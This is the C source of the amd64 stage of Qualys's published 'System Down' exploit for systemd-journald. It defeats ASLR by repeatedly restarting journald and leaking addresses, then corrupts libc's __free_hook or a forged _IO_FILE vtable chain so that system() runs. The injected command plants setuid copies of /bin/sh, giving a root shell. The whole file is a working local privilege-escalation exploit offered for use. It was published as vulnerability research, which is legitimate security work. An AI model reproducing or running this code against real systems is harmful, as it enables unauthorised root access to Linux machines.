/*
 * System Down: A systemd-journald exploit
 * https://www.qualys.com/2019/01/09/system-down/system-down.txt
 * Copyright (C) 2019 Qualys, Inc.
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <https://www.gnu.org/licenses/>.
 */

#include <limits.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/param.h>
#include <unistd.h>

#include "exploit.h"
#include "infoleak.h"
#include "journald.h"
#include "ldd.h"
#include "macro.h"
#include "reverse.h"
#include "target.h"

static size_t ldso_to_first_lib_distance;
static size_t ldso_to_libc_distance;

enum {
    IN_HEAP,
    IN_LDSO_HOLE,
    IN_COMMON_MMAP,
};

static int
locate_binary_item(const size_t binary_item_heap_size)
{
    if (!binary_item_heap_size) die();
    if (!ldso_to_first_lib_distance) die();

    unsigned try;
    for (try = 1; try <= 100; try++) {
        address_t addresses[] = {
            { .offset = -2 },
            { .offset = -1 },
            { .offset = 0 },
        };
        restart_journald();
        infoleak(addresses, ELEMENTSOF(addresses), binary_item_heap_size, ELF64_SEGMENT_ALIGNMENT);
        if (!is_transport_address(addresses[2].value)) continue;

        const uintptr_t tempfile_item_address = addresses[0].value;
        if (!is_mmap_address(tempfile_item_address)) continue;

        const uintptr_t binary_item_address = addresses[1].value;
        if (is_pie_address(binary_item_address)) return IN_HEAP;
        if (!is_mmap_address(binary_item_address)) continue;

        if (binary_item_address > tempfile_item_address) {
            if (binary_item_address - tempfile_item_address > ldso_to_first_lib_distance)
                return IN_LDSO_HOLE;
        }
        if (binary_item_address < tempfile_item_address) {
            if (tempfile_item_address - binary_item_address > binary_item_heap_size)
                return IN_COMMON_MMAP;
        }
    }
    die();
}

static size_t
bsearch_ldso_hole_size(void)
{
    if (DEFAULT_MMAP_THRESHOLD_MIN <= PAGE_SIZE) die();
    if (DEFAULT_MMAP_THRESHOLD_MIN >= ELF64_SEGMENT_ALIGNMENT) die();

    size_t low = DEFAULT_MMAP_THRESHOLD_MIN - PAGE_SIZE;
    if (locate_binary_item(low) != IN_HEAP) die();

    size_t high = ELF64_SEGMENT_ALIGNMENT;
    if (locate_binary_item(high) != IN_COMMON_MMAP) die();

    for (;;) {
        if (low % PAGE_SIZE) die();
        if (high % PAGE_SIZE) die();
        printf("low %zu high %zu\n", low, high);

        if (high <= low) die();
        if (high - low <= PAGE_SIZE) break;

        const size_t mid = (low + (high - low) / 2) & ~(PAGE_SIZE-1);
        if (mid >= high) die();
        if (mid <= low) die();

        switch (locate_binary_item(mid)) {
        case IN_HEAP:
        case IN_LDSO_HOLE:
            low = mid;
            break;
        case IN_COMMON_MMAP:
            high = mid;
            break;
        default:
            die();
        }
    }
    if (locate_binary_item(low) != IN_LDSO_HOLE) die();
    printf("ldso_hole_size heap:%zu mmap:%zu\n", low, low + PAGE_SIZE);
    return low;
}

static size_t
exploit_amd64_internal(const char * const self, const size_t data_size_max)
{
    if (target_arch() != TARGET_AMD64) die();
    if (!self) die();
    if (data_size_max > DATA_SIZE_MAX) die();
    if (data_size_max <= DEFAULT_MAX_SIZE_UPPER) die();
    printf("data_size_max %zu MB\n", data_size_max >> 20);
    const tempfile_t tempfile = open_native_tempfile(true, data_size_max);
    size_t data_size = 0;

    const size_t stack_to_libc_distance_max =
        (data_size_max - DEFAULT_MAX_SIZE_UPPER) / NATIVE_ITEM_LEN * sizeof(EntryItem);
    printf("stack_to_libc_distance_max %zu MB\n", stack_to_libc_distance_max >> 20);
    if (stack_to_libc_distance_max <= MIN_GAP) die();
    const size_t average_tries = ((size_t)1 << (34 - 20)) * ((size_t)1 << (40 - 20)) * 2 /
        ((stack_to_libc_distance_max >> 20) * (stack_to_libc_distance_max >> 20));

    static char setuid_shell[PATH_MAX];
    if (target_setuid_shells()) {
        xsnprintf(setuid_shell, sizeof(setuid_shell),
            "for i in %s; do cp -n /bin/sh \"$i\" && chmod 4755 \"$i\"; done", SETUID_SHELLS);
    } else {
        xsnprintf(setuid_shell, sizeof(setuid_shell), "'%s'", self);
    }
    static char command[PATH_MAX];
    const unsigned command_len = xsnprintf(command, sizeof(command),
        "@@@@; %s; kill -9 $PPID; # ", setuid_shell);

    static char buf[1048576];
    size_t i;

  {
    list_shared_libraries(target_bin_journald(), buf, sizeof(buf));
    const uintptr_t first_lib_address = shared_library_address(buf, NULL);
    const uintptr_t libc_address = shared_library_address(buf, "/libc.so.6 ");
    const uintptr_t ldso_address = shared_library_address(buf, "/ld-linux-x86-64.so.2 ");

    if (ldso_address <= first_lib_address) die();
    ldso_to_first_lib_distance = ldso_address - first_lib_address;
    if (ldso_address <= libc_address) die();
    ldso_to_libc_distance = ldso_address - libc_address;
  }

    uintptr_t leaked_mmap_address = 0;
    uintptr_t leaked_stack_address = 0;
  {
    const size_t ldso_hole_size = bsearch_ldso_hole_size();
    printf("average_tries %zu\n", average_tries);

    size_t try;
    for (try = 1; ; try++) {
        if (try > average_tries * 19) die();
        if (!(try % 32)) printf("try %zu (probability 1/%zu)\n", try, average_tries);

        address_t addresses[] = {
            { .offset = -1 },
            { .offset = 0 },
            { .offset = infoleak_lowest_stack_offset() },
        };
        restart_journald();
        infoleak(addresses, ELEMENTSOF(addresses), 0, ldso_hole_size);
        if (!is_transport_address(addresses[1].value)) continue;

        leaked_mmap_address = addresses[0].value;
        leaked_stack_address = addresses[2].value;
        if (!is_mmap_address(leaked_mmap_address)) continue;
        if (!is_stack_address(leaked_stack_address)) continue;

        if (leaked_stack_address <= leaked_mmap_address) die();
        const size_t stack_to_ldso_distance = leaked_stack_address - leaked_mmap_address;
        const size_t stack_to_libc_distance = stack_to_ldso_distance + ldso_to_libc_distance;

        if (stack_to_libc_distance <= MIN_GAP) continue;
        if (stack_to_libc_distance <= stack_to_libc_distance_max) {
            printf("stack_to_libc_distance %zu MB\n", stack_to_libc_distance >> 20);
            data_size = stack_to_libc_distance / sizeof(EntryItem) * NATIVE_ITEM_LEN +
                DEFAULT_MAX_SIZE_UPPER;
            break;
        }
    }
  }
    if (!leaked_mmap_address) die();
    if (!leaked_stack_address) die();

    leaked_mmap_address -= mmap2mem() + (infoleak_n_iovec_fields() - 1) * NATIVE_ITEM_LEN;
    if (leaked_mmap_address % PAGE_SIZE) die();

    const uintptr_t ldso_address = leaked_mmap_address - PAGE_ALIGN(target_ldso_rx_size());
    printf("ldso_address %012lx\n", (unsigned long)ldso_address);
    const uintptr_t libc_address = ldso_address - ldso_to_libc_distance;
    printf("libc_address %012lx\n", (unsigned long)libc_address);

    const uintptr_t write_where = libc_address + (target_free_hook_offset() ?: target_stderr_chain_offset());
    printf("write_where %012lx\n", (unsigned long)write_where);
    const uintptr_t items_alloca = write_where - offsetof(EntryItem, hash) - target_items_alloca_shift();
    printf("items_alloca %012lx\n", (unsigned long)items_alloca);
    if (items_alloca & 0xf) die();

    const uintptr_t rsp_before_alloca = leaked_stack_address - target_stack_pointer_distance();
    printf("rsp_before_alloca %012lx\n", (unsigned long)rsp_before_alloca);
    if (rsp_before_alloca <= items_alloca) die();
    const size_t items_alloca_size = rsp_before_alloca - items_alloca + (-rsp_before_alloca & 0xf);
    printf("items_alloca_size %zu\n", items_alloca_size);
    if (items_alloca_size & 0xf) die();

  {
    if (rsp_before_alloca <= items_alloca_size) die();
    const uintptr_t rsp_after_alloca = rsp_before_alloca - items_alloca_size;
    if (items_alloca != ((rsp_after_alloca + 0xf) & ~(uintptr_t)0xf)) die();
  }

    if (items_alloca_size <= journald_LimitSTACKSoft()) die();
    const size_t items_alloca_request = items_alloca_size - (0x1e & ~0xf);
    if (items_alloca_request % sizeof(EntryItem)) die();

    const size_t n_iovec_total_fields = items_alloca_request / sizeof(EntryItem);
    const size_t n_iovec_extra_fields = infoleak_n_iovec_extra_fields();
    if (n_iovec_total_fields <= n_iovec_extra_fields) die();

    size_t iovec_n = n_iovec_total_fields - n_iovec_extra_fields;
    const size_t shift_n = target_items_alloca_shift() / sizeof(EntryItem);
    if (iovec_n <= shift_n + 2) die();
    iovec_n -= shift_n + 2;

    const uintptr_t write_what = target_free_hook_offset() ? libc_address + target_system_offset() :
        (ldso_address - ldso_to_first_lib_distance - iovec_n * NATIVE_ITEM_LEN - DEFAULT_MAX_SIZE_UPPER / 2)
            & ~(uintptr_t)(PAGE_SIZE-1); /* struct _IO_FILE * fp */
    printf("write_what %012lx\n", (unsigned long)write_what);
    static char write_data[64];
    reverse_hash64(write_what, write_data, sizeof(write_data));
    printf("write_data %s\n", write_data);

    for (i = 0; i < shift_n; i++) {
        xwrite(tempfile.fd, NATIVE_ITEM, NATIVE_ITEM_LEN);
    }

    xwrite(tempfile.fd, write_data, strlen(write_data));
    xwrite(tempfile.fd, "\n", 1);

  {
    xwrite(tempfile.fd, "A=", 2);
    memset(buf, '\xff', sizeof(buf));
    if (target_stderr_chain_offset()) {
        if (sizeof(buf) % PAGE_SIZE) die();
        const size_t align_n = -((tempfile.is_memfd ? 0 : mmap2mem()) + native_tempfile_size(tempfile))
            % PAGE_SIZE;
        if (align_n) xwrite(tempfile.fd, buf, align_n);

        uintptr_t * const fp = (void *)buf;
        fp[0] = 0; /* _flags */
        /* !(_flags & (_IO_NO_WRITES | _IO_CURRENTLY_PUTTING | _IO_UNBUFFERED)) */
        if (command_len >= 16 * sizeof(*fp)) die();
        memcpy(fp, command, command_len + 1);
        fp[16] = 0; /* _vtable_offset */
        fp[24] = 1; /* _mode */
        fp[27] = libc_address + target_wfile_jumps_offset(); /* vtable */
        fp[20] = write_what + PAGE_SIZE / 4; /* _wide_data */

        uintptr_t * const _wide_data = (void *)(buf + PAGE_SIZE / 4);
        _wide_data[3] = 0; /* _IO_write_base */
        _wide_data[4] = 1; /* _IO_write_ptr */
        _wide_data[6] = 0; /* _IO_buf_base */
        _wide_data[40] = write_what + PAGE_SIZE / 2; /* _wide_vtable */

        uintptr_t * const _wide_vtable = (void *)(buf + PAGE_SIZE / 2);
        _wide_vtable[13] = libc_address + target_system_offset(); /* __doallocate */

        if (memchr(buf, '\n', PAGE_SIZE)) {
            puts("newline in payload");
            data_size = 0;
            goto cleanup;
        }
        for (i = 1; i < sizeof(buf) / PAGE_SIZE; i++) {
            memcpy(buf + i * PAGE_SIZE, buf, PAGE_SIZE);
        }
    }
    size_t chars_n = DEFAULT_MAX_SIZE_UPPER;
    while (chars_n) {
        const size_t write_n = MIN(chars_n, sizeof(buf));
        xwrite(tempfile.fd, buf, write_n);
        chars_n -= write_n;
    }
    xwrite(tempfile.fd, "\n", 1);
  }

    if (target_free_hook_offset()) {
        const uint64_t len = command_len + 1;
        xwrite(tempfile.fd, "A\n", 2);
        xwrite(tempfile.fd, &len, sizeof(len));
        xwrite(tempfile.fd, command, len);
        xwrite(tempfile.fd, "\n", 1);
        iovec_n -= 1;
    }

  {
    const size_t inbuf_n = sizeof(buf) / NATIVE_ITEM_LEN;
    for (i = 0; i < inbuf_n; i++) {
        memcpy(buf + i * NATIVE_ITEM_LEN, NATIVE_ITEM, NATIVE_ITEM_LEN);
    }
    while (iovec_n) {
        const size_t write_n = MIN(iovec_n, inbuf_n);
        xwrite(tempfile.fd, buf, write_n * NATIVE_ITEM_LEN);
        iovec_n -= write_n;
    }
  }

  {
    const int native_fd = open_native_connection();
    send_native_tempfile(native_fd, tempfile);
    if (close(native_fd)) die();
  }

cleanup:
    if (close(tempfile.fd)) die();
    restart_journald();
    return data_size;
}

#define DATA_SIZE_STEP ((size_t)64 << 20)

void
exploit_amd64(const char * const self, size_t data_size_max)
{
    if (!data_size_max) data_size_max = DATA_SIZE_MAX;

    size_t i;
    for (i = 0; i < DATA_SIZE_MAX / DATA_SIZE_STEP * 2; i++) {
        const size_t data_size = exploit_amd64_internal(self, data_size_max);
        if (!data_size) continue;

        if (exploit_has_succeeded(self)) exit(EXIT_SUCCESS);
        data_size_max = (data_size_max - 1) & ~(DATA_SIZE_STEP-1);
    }
    die();
}

